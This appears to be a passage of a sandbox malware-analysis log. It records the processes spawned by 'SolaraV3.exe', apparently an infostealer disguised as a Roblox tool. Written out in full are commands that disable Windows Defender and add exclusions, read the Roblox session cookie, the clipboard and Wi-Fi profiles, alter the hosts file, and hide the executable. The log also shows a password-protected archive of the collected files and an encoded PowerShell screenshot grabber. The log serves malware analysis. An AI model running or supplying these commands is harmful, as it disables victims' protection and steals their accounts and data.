HQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'	Jump to behavior
